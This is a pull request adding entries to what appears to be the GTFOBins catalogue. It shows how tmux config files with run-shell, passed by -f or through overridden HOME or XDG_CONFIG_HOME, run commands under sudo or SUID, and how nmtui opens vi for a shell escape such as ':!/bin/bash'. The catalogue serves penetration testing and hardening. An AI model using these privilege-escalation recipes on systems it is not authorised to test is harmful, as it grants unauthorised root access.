### PR TITLE
Add tmux command and nmtui inherit

### DIFF
--- a/_gtfobins/nmtui
+++ b/_gtfobins/nmtui
@@ -1,0 +1,12 @@
+---
+functions:
+  inherit:
+  - code: |-
+      EDITOR=vi nmtui
+    comment: |-
+      Navigate to "Edit a connection", select "Add", choose "Team", then select "Edit" under JSON configuration to invoke the editor. `VISUAL` takes precedence over `EDITOR` when both are set and can be used instead.
+    contexts:
+      sudo:
+      suid:
+    from: vi
+...

--- a/_gtfobins/tmux
+++ b/_gtfobins/tmux
@@ -1,5 +1,36 @@
 ---
 functions:
+  command:
+  - blind: true
+    code: |-
+      echo 'run-shell "/path/to/command"' >/path/to/temp-file.conf
+      tmux -f /path/to/temp-file.conf
+    contexts:
+      sudo:
+      suid:
+        shell: true
+  - blind: true
+    code: |-
+      mkdir -p /path/to/temp-dir
+      echo 'run-shell "/path/to/command"' >/path/to/temp-dir/.tmux.conf
+      HOME=/path/to/temp-dir tmux
+    comment: |-
+      If the `HOME` directory is already writable, the file can be placed directly as `~/.tmux.conf` without overriding `HOME`. The `HOME` environment variable must be passed to the privileged process.
+    contexts:
+      sudo:
+      suid:
+        shell: true
+  - blind: true
+    code: |-
+      mkdir -p /path/to/temp-dir/tmux
+      echo 'run-shell "/path/to/command"' >/path/to/temp-dir/tmux/tmux.conf
+      XDG_CONFIG_HOME=/path/to/temp-dir tmux
+    comment: |-
+      The `XDG_CONFIG_HOME` environment variable must be passed to the privileged process.
+    contexts:
+      sudo:
+      suid:
+        shell: true
   file-read:
   - binary: false
     code: |-


### PR DESCRIPTION
### tmux command
tmux loads a config file from ~/.tmux.conf, $XDG_CONFIG_HOME/tmux/tmux.conf, or a path specified via -f.
The run-shell directive in the config executes arbitrary commands. Three variants are documented: explicit -f flag, overriding HOME, and overriding XDG_CONFIG_HOME.

### nmtui inherit
nmtui can invoke an editor (controlled via $EDITOR or $VISUAL, with VISUAL taking precedence) to edit JSON configuration for a team connection. This launches specified editor, therefore, inherits vi's shell escape techniques (e.g. `:!/bin/bash`). Navigate to "Edit a connection" -> "Add" -> "Team" -> "Edit" under JSON configuration to open the editor.